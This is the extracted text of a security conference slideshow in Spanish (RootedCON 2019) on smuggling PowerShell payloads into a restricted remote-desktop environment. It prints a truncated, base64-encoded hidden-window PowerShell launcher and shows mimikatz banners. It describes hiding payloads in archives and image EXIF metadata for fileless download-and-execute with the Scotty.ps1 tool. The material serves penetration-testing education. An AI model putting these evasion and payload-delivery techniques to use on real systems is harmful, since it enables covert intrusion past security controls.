Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Manuel Garcia & Álvaro Villaverde - Beam me up, Scotty! [rooted2019]

158 views

Published on

Manuel Garcia & Álvaro Villaverde - Beam me up, Scotty! [rooted2019]

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Manuel Garcia & Álvaro Villaverde - Beam me up, Scotty! [rooted2019]

  1. 1. Beam me up, Scotty! To boldly send shellcode where no payload has gone before… Centro Hacking - Everis Aeroespacial y Defensa
  2. 2. Mission briefing CHAPTERI–Introducción CHAPTERII–Desafío CHAPTERIII–Solución1 CHAPTERIV–Solución2 CHAPTERV–Solución3 CHAPTERVI–Roadmap SEASONFINALE–Preguntas Centro Hacking - Everis Aeroespacial y Defensa
  3. 3. Introducción Nombre:Manu“Hypnito”García Posición:Pentesterresidente Asignación:UUS-ENT-CH Detalles: • NosabehacerelsaludoVulcano Nombre:ÁlvaroVillaverde Posición:Pentesterresidente Asignación:UUS-ENT-CH Detalles:  TampocosabehacerelsaludoVulcano Centro Hacking - Everis Aeroespacial y Defensa
  4. 4. Mission briefing CHAPTERI–Introducción CHAPTERII–Desafío CHAPTERIII–Solución1 CHAPTERIV–Solución2 CHAPTERV–Solución3 CHAPTERVI–Roadmap SEASONFINALE–Preguntas Centro Hacking - Everis Aeroespacial y Defensa
  5. 5. Desafío Reglas: Soloaccesoporescritorioremoto Copiadearchivosdeshabilitada Copiar&Pegardeshabilitado Objetivo: Enumeración,análisis,yexplotación Centro Hacking - Everis Aeroespacial y Defensa
  6. 6. Desafío .#####. mimikatz 2.1.1 (x64) #17763 Dec 9 2018 23:56:50 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition ** ## / ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ __ __ _ / / / __ _| |_ ___ ___ _ __ / / / _` | __/ __|/ _ | '_ / / (_| | |___ (_) | | | | / / __,_|__|___/___/|_| |_| v0.1 Sherlock sucks... @_RastaMouse Centro Hacking - Everis Aeroespacial y Defensa
  7. 7. Desafío .#####. mimikatz 2.1.1 (x64) #17763 Dec 9 2018 23:56:50 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition ** ## / ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ __ __ _ / / / __ _| |_ ___ ___ _ __ / / / _` | __/ __|/ _ | '_ / / (_| | |___ (_) | | | | / / __,_|__|___/___/|_| |_| v0.1 Sherlock sucks... @_RastaMouse Centro Hacking - Everis Aeroespacial y Defensa
  8. 8. Desafío Centro Hacking - Everis Aeroespacial y Defensa
  9. 9. Desafío Centro Hacking - Everis Aeroespacial y Defensa
  10. 10. Desafio Centro Hacking - Everis Aeroespacial y Defensa
  11. 11. Desafio aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0A CkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQ BsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHk AcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBs AGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAf QA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE QAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB 0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMA LgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkA GQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOg A6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4 AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0 ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABT… Centro Hacking - Everis Aeroespacial y Defensa
  12. 12. Mission briefing CHAPTERI–Introducción CHAPTERII–Desafío CHAPTERIII–Solución1 CHAPTERIV–Solución2 CHAPTERV–Solución3 CHAPTERVI–Roadmap SEASONFINALE–Preguntas Centro Hacking - Everis Aeroespacial y Defensa
  13. 13. Solución 1 – Archivo Comprimido EJEMPLO: Centro Hacking - Everis Aeroespacial y Defensa
  14. 14. Solución 1 – Archivo Comprimido Pros: Universal Powershell 2.0 Contras: Muyconocido Máximodecaracteresporfragmentode253+3 chars. Ocultarelcontenido requiere herramientas extraenel objetivo(7zorarparacifradodenombresdearchivo) Bloqueado enmuchosproxies,especialmentesiestacifrado. Centro Hacking - Everis Aeroespacial y Defensa
  15. 15. Solución 1 – Archivo Comprimido Centro Hacking - Everis Aeroespacial y Defensa
  16. 16. Mission briefing CHAPTERI–Introducción CHAPTERII–Desafío CHAPTERIII–Solución1 CHAPTERIV–Solución2 CHAPTERV–Solución3 CHAPTERVI–Roadmap SEASONFINALE–Preguntas Centro Hacking - Everis Aeroespacial y Defensa
  17. 17. Solución 2 – Datos EXIF (Shell. Application) Ejemplo: Centro Hacking - Everis Aeroespacial y Defensa
  18. 18. Solución 2 – Datos EXIF (Shell. Application) Pros: Fragmentosde1024chars.max Altovolumendetráficodeimágenes enelproxy. ¿Quién bloquea lasimágenes? Powershell 2.0 Contras: Powershell Shell.Application requiere ladescarga delarchivo parapoder acceder alaspropiedades. Laspropiedades sonfácilmentevisibles. Centro Hacking - Everis Aeroespacial y Defensa
  19. 19. Solución 2 – Datos EXIF (Shell. Application) Centro Hacking - Everis Aeroespacial y Defensa
  20. 20. Mission briefing CHAPTERI–Introducción CHAPTERII–Desafío CHAPTERIII–Solución1 CHAPTERIV–Solución2 CHAPTERV–Solución3 CHAPTERVI–Roadmap SEASONFINALE–Preguntas Centro Hacking - Everis Aeroespacial y Defensa
  21. 21. Solución 3 – Datos EXIF (System.Drawing) Centro Hacking - Everis Aeroespacial y Defensa
  22. 22. Solución 3 – Datos EXIF (System.Drawing) Invoke-WebRequestdescargalaimagenamemoriacomoun arraydebytes System.Drawing.Imagecargalaimagendesdeelarraydebytesycreaelobjeto Centro Hacking - Everis Aeroespacial y Defensa
  23. 23. Solución 3 – Datos EXIF (System.Drawing) System.Imaging.Drawing.PropertyItem Centro Hacking - Everis Aeroespacial y Defensa
  24. 24. Solución 3 – Datos EXIF (System.Drawing) Centro Hacking - Everis Aeroespacial y Defensa
  25. 25. Solución 3 – Datos EXIF (System.Drawing) System.Imaging.Drawing.PropertyItem LapropiedadTypedefinesisealmacenaunarraydebits,ASCII… CadatagEXIFtieneuntiposegúnelestándar Peroparalamayoríadelaspropiedades,lalibreríapermiteescribiruntipoarbitrario, aunquevioleelestándar MenosestrictoconlosJPGqueconlosPNG CasiningúnsoftwaresequejasirenombrasunJPGaPNG Centro Hacking - Everis Aeroespacial y Defensa
  26. 26. Solución 3 – Datos EXIF (System.Drawing) Scotty.ps1 https://github.com/CHeveris/Scotty Escribeunpayloadenbase64enlosmetadatosdeunaimagen.jpg Todoslostiposdepropiedadmenosel2(ASCII)y6(Arraydebits) Pordefectoseparaelpayloadensegmentosde1000chars Devuelve10líneasparadescargaryejecutarelpayload Centro Hacking - Everis Aeroespacial y Defensa
  27. 27. Solución 3 – Datos EXIF (System.Drawing) Centro Hacking - Everis Aeroespacial y Defensa
  28. 28. Solución 3 – Datos EXIF (System.Drawing) Centro Hacking - Everis Aeroespacial y Defensa
  29. 29. Solución 3 – Datos EXIF (System.Drawing) Centro Hacking - Everis Aeroespacial y Defensa
  30. 30. Solución 3 – Datos EXIF (System.Drawing) Pros: Fileless Incumplelosestándares CuelgaalgunasversionesdeExifTool¬_¬ Contras: Puedenosobrevivirmodificacionesdelaimagen Powershell5.0 Centro Hacking - Everis Aeroespacial y Defensa
  31. 31. Solución 3 – Datos EXIF (System.Drawing) Centro Hacking - Everis Aeroespacial y Defensa
  32. 32. Solución 3 – Datos EXIF (System.Drawing) Centro Hacking - Everis Aeroespacial y Defensa
  33. 33. Mission briefing CHAPTERI–Introducción CHAPTERII–Desafío CHAPTERIII–Solución1 CHAPTERIV–Solución2 CHAPTERV–Solución3 CHAPTERVI–Roadmap SEASONFINALE–Preguntas Centro Hacking - Everis Aeroespacial y Defensa
  34. 34. Roadmap Soportemejoradoparaotrosformatos(.png) Usodemúltiplesimágenes Repositoriodegithubaimágenes One-Linerpayload Centro Hacking - Everis Aeroespacial y Defensa
  35. 35. Preguntas Centro Hacking - Everis Aeroespacial y Defensa
  36. 36. Centro Hacking - Everis Aeroespacial y Defensa CHeveris aeroespacial-y- defensa blog.everis.com centro.hacking@everis.com
  37. 37. Por cierto… Centro Hacking - Everis Aeroespacial y Defensa

×